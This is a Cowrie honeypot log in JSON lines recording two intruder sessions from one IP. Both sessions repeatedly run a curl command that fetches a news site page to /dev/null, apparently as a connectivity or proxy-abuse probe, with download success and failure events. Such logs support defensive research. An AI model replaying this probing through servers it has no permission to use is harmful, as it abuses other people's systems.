{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.081204Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.092248Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.096545Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.101099Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.106406Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.107849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.134048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.135400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.137145Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.138769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.145716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.147704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.173361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.174971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.177589Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.184223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.185975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.222061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.223716Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.225992Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.228474Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.230197Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.231254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.276454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.278439Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.280944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.281680Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.283311Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.284242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.318564Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.320689Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.334391Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.335987Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.338839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.340017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.361903Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.363424Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.372924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.373999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.377686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.378711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.408837Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.416576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.417770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.419682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.424501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.425519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.427863Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.433982Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.462272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.463765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.471468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.472461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.480628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.481621Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.502114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.503292Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.513270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.514377Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.533267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.534895Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.542583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.543655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.557395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.558704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.577048Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.579491Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.593319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.594537Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.611141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.612331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.620388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.621769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.637909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.639162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.658380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.659626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.661465Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.664402Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.699602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.700832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.702807Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.705445Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.728645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.729972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.737669Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.739872Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.778198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.780155Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.783460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.784997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.841588Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.843083Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.882246Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.889479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.890507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.907242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.908313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.924258Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.925589Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.983016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.984093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.985690Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.987061Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:57.988792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:57.990190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.031291Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.032374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.035305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.037049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.039934Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.042467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.056450Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.076817Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.078376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.079443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.081725Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.084327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.085216Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.117130Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
